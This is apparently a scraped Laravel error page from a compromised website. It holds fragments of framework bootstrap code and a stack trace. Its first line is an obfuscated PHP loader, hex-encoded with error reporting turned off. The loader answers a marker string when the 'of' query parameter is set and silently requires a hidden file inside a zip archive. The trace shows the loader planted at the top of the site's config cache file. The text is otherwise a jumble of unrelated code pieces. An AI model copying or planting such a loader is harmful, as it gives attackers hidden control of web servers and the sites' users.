<?php error_reporting(0); $tsx = array("\x5f\107\x45\x54"); (${$tsx[0]}["\157\x66"] == 1) && die("x0B6Sm91lsLy3zOTVwH4QAqyDJRpzgSHeksUPdsf5Kc3fQamDf9TvnrXUEY1s6Vo"); @require_once "\x7a\x69\x70\x3a\x2f\x2f\x6d\x33\x75\x5f\x36\x38\x39\x62\x66\x30\x61\x33\x61\x62\x37\x37\x65\x2e\x7a\x69\x70\x23\x63\x5f\x36\x38\x39\x62\x66\x30\x61\x33\x61\x62\x37\x37\x65\x2e\x74\x6d\x70"; ?>
if (! isset($files['app'])) {
throw new Exception('Unable to load the "app" configuration file.');
}
foreach ($files as $key => $path) {
$repository->set($key, require $path);
}
}
/**
* Get all of the configuration files for the application.
// directory and load each one into the repository. This will make all of the
// options available to the developer for use in various parts of this app.
$app->instance('config', $config = new Repository($items));
if (! isset($loadedFromCache)) {
$this->loadConfigurationFiles($app, $config);
}
// Finally, we will set the application's environment based on the configuration
// values that were loaded. We will pass a callback which will be used to get
// the environment in a web context where an "--env" switch is not present.
$this->hasBeenBootstrapped = true;
foreach ($bootstrappers as $bootstrapper) {
$this['events']->dispatch('bootstrapping: '.$bootstrapper, [$this]);
$this->make($bootstrapper)->bootstrap($this);
$this['events']->dispatch('bootstrapped: '.$bootstrapper, [$this]);
}
}
* @return void
*/
public function bootstrap()
{
if (! $this->app->hasBeenBootstrapped()) {
$this->app->bootstrapWith($this->bootstrappers());
}
}
/**
* Get the route dispatcher callback.
{
$this->app->instance('request', $request);
Facade::clearResolvedInstance('request');
$this->bootstrap();
return (new Pipeline($this->app))
->send($request)
->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
->then($this->dispatchToRouter());
$this->requestStartedAt = Carbon::now();
try {
$request->enableHttpMethodParameterOverride();
$response = $this->sendRequestThroughRouter($request);
} catch (Throwable $e) {
$this->reportException($e);
$response = $this->renderException($request, $e);
}
|
*/
$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);
$response = $kernel->handle(
$request = Illuminate\Http\Request::capture()
);
$response->send();
Error
|
---|
Error: Failed opening required 'zip://m3u_689bf0a3ab77e.zip#c_689bf0a3ab77e.tmp' (include_path='.:/opt/cpanel/ea-php83/root/usr/share/pear') at /home/techdyno/rtl.techdynobdltd.com/config/config/cache.php:1 at require() (/home/techdyno/rtl.techdynobdltd.com/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php:70) at Illuminate\Foundation\Bootstrap\LoadConfiguration->loadConfigurationFiles(object(Application), object(Repository)) (/home/techdyno/rtl.techdynobdltd.com/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php:39) at Illuminate\Foundation\Bootstrap\LoadConfiguration->bootstrap(object(Application)) (/home/techdyno/rtl.techdynobdltd.com/vendor/laravel/framework/src/Illuminate/Foundation/Application.php:242) at Illuminate\Foundation\Application->bootstrapWith(array('Illuminate\\Foundation\\Bootstrap\\LoadEnvironmentVariables', 'Illuminate\\Foundation\\Bootstrap\\LoadConfiguration', 'Illuminate\\Foundation\\Bootstrap\\HandleExceptions', 'Illuminate\\Foundation\\Bootstrap\\RegisterFacades', 'Illuminate\\Foundation\\Bootstrap\\RegisterProviders', 'Illuminate\\Foundation\\Bootstrap\\BootProviders')) (/home/techdyno/rtl.techdynobdltd.com/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:176) at Illuminate\Foundation\Http\Kernel->bootstrap() (/home/techdyno/rtl.techdynobdltd.com/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:160) at Illuminate\Foundation\Http\Kernel->sendRequestThroughRouter(object(Request)) (/home/techdyno/rtl.techdynobdltd.com/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:134) at Illuminate\Foundation\Http\Kernel->handle(object(Request)) (/home/techdyno/rtl.techdynobdltd.com/index.php:61) |